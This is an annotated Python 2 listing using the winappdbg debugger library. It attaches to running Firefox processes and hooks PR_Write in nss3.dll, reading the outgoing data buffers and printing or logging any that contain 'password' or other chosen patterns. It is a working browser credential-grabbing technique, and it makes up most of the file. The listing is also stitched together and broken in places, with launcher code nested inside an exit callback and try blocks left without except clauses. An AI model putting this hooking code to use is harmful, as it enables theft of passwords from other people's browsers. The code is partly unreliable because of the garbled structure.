def simple_debugger():
    """Start three sample programs under one debugger and run its event loop.

    The debugger is given ``EventSift(MyEventHandler)``; the commented-out
    line below hands it a single ``MyEventHandler`` instance instead, and the
    original listing invites the reader to swap the two and compare.  Both
    names, like ``Debug``, come from the surrounding file, not this block.
    """
    # Wrap the handler *class* rather than instantiating it (presumably one
    # handler instance per debugged process -- verify against EventSift docs).
    handler = EventSift(MyEventHandler)
    # handler = MyEventHandler()  # try uncommenting this line...

    # The programs are launched in exactly this order, then events are pumped.
    sample_programs = ("calc.exe", "notepad.exe", "charmap.exe")
    with Debug(handler) as debug:
        for program in sample_programs:
            debug.execl(program)
        debug.loop()
def exit_process(self, event):
    """Report that the debugger detached from this handler's process.

    ``self.name`` is not assigned in this block; it is presumably set by
    another event method of the enclosing class (whose header is not in
    view) -- confirm before relying on it.
    """
    print "Detached from %s" % self.name
    # NOTE(review): the remainder reads like a separate launcher routine whose
    # ``def`` line was lost when the listing was collapsed; it is kept inside
    # this method only because it references ``self.name``.  Re-launching the
    # same program from an exit_process callback is unusual -- verify the
    # nesting against the original file.
    handler = EventSift(MyEventHandler)
    #handler = MyEventHandler() # try uncommenting this line...
    with Debug(handler) as debug:
        debug.execl(self.name)
        debug.loop()
def single_step(self, event):
    """Single-step callback: copy the hooked call's buffer and log it when a
    watched pattern occurs in it.

    The enclosing class header is not in view.  ``self.patterns`` is not
    assigned in this block -- assumed to be an iterable of strings set
    elsewhere in the class (TODO confirm).  ``mylogger`` is the module-level
    Logger created in the script below; it is resolved at call time, so the
    later assignment is fine as long as the script has run first.
    """
    thread = event.get_thread()
    process = event.get_process()
    # Rdx and R8 exist only on x64; under the Microsoft x64 convention they
    # carry the 2nd and 3rd integer arguments, which the original comments
    # label as buffer pointer and byte count.  A 32-bit target would need a
    # different way of fetching the arguments.  (``buffer`` shadows the
    # Python 2 builtin of the same name.)
    buffer = thread.get_register("Rdx") # 2nd param buf
    size = thread.get_register("R8") # 3rd param buf amount
    # The length comes straight from the debuggee's register, so a bogus or
    # very large value reads that much memory into the log; capping it before
    # the read would be prudent.
    text = str(process.read(buffer, size))
    # A buffer matching several patterns is logged once per matching pattern.
    for pattern in self.patterns:
        if pattern in text:
            mylogger.log_text("-" * 50)
            mylogger.log_text(text)
            mylogger.log_text("-" * 50)


# --- script: attach to every running firefox.exe and pump events ---
# Defender's note: the observable footprint of this script is a debugger
# attaching to the browser process followed by reads of its write buffers.
# The attach loop is duplicated verbatim in the soft-hook listing below.
mylogger = winappdbg.Logger()
# FirefoxHardHookEventHandler is defined elsewhere in the file (not in view).
handler = EventSift(FirefoxHardHookEventHandler)
# bKillOnExit=False: presumably leaves the debuggees running when the debugger
# detaches instead of terminating them -- verify against winappdbg.
with Debug(handler, bKillOnExit=False) as debug:
    found_ff = False
    debug.system.scan()
    # ``name`` is unpacked but never used.
    for (proc, name) in debug.system.find_processes_by_filename("firefox.exe"):
        pid = proc.get_pid()
        debug.attach(pid)
        print "[*] attached debugger to firefox: %d" % pid
        found_ff = True
    if found_ff:
        # NOTE: the except/finally clause of this try, and anything after it,
        # lies outside the visible listing.
        try:
            print "[*] monitoring CTRL-C to exit"
            debug.loop()
class FirefoxSoftHookEventHandler(EventHandler):
    """Event handler that installs a software hook on ``PR_Write`` in ``nss3.dll``.

    ``apiHooks`` presumably follows the winappdbg declarative hook convention:
    the key is a module name, the value a list of ``(function, argument_types)``
    tuples; a ``pre_<function>`` method is then invoked before each call with
    the decoded arguments (verify against the library docs).  ``EventHandler``
    and ``win32`` come from the surrounding file.
    """
    # PR_Write(fd, buf, amount): two pointers and a 32-bit unsigned integer.
    apiHooks = {
        "nss3.dll": [("PR_Write", (win32.PVOID, win32.PVOID, win32.DWORD32))]
    }

    def pre_PR_Write(self, evt, ra, fd, buf, amount):
        """Pre-call hook: copy the outgoing buffer and print it when it
        contains the literal ``"password"``.

        Args:
            evt: the hook event; only its process is used.
            ra: presumably the return address of the hooked call -- unused.
            fd: PR_Write's first argument -- unused.
            buf: pointer into the debuggee to the data about to be written.
            amount: number of bytes to read from ``buf``.
        """
        proc = evt.get_process()
        # ``amount`` comes from the debuggee, so an unexpected value reads
        # that much memory; there is no cap here.
        data = proc.read(buf, amount)
        # Plain substring test on the raw buffer.  Under Python 2 (the listing
        # uses print statements) the read returns a ``str``; under Python 3 it
        # would be ``bytes`` and the literal would need a ``b`` prefix.
        if "password" in data:
            print "[+] %s" % data


# --- script: attach to every running firefox.exe and pump events ---
# Defender's note: the observable footprint is a debugger attaching to the
# browser process and a hook on its write path.  This attach loop duplicates
# the hard-hook listing above; a shared helper would remove the repetition.
handler = EventSift(FirefoxSoftHookEventHandler)
# bKillOnExit=False: presumably leaves the debuggees running when the debugger
# detaches instead of terminating them -- verify against winappdbg.
with Debug(handler, bKillOnExit=False) as debug:
    found_ff = False
    debug.system.scan()
    # ``name`` is unpacked but never used.
    for (proc, name) in debug.system.find_processes_by_filename("firefox.exe"):
        pid = proc.get_pid()
        debug.attach(pid)
        print "[*] attached debugger to firefox: %d" % pid
        found_ff = True
    if found_ff:
        # NOTE: the except/finally clause of this try, and anything after it,
        # lies outside the visible listing.
        try:
            print "[*] monitoring CTRL-C to exit"
            debug.loop()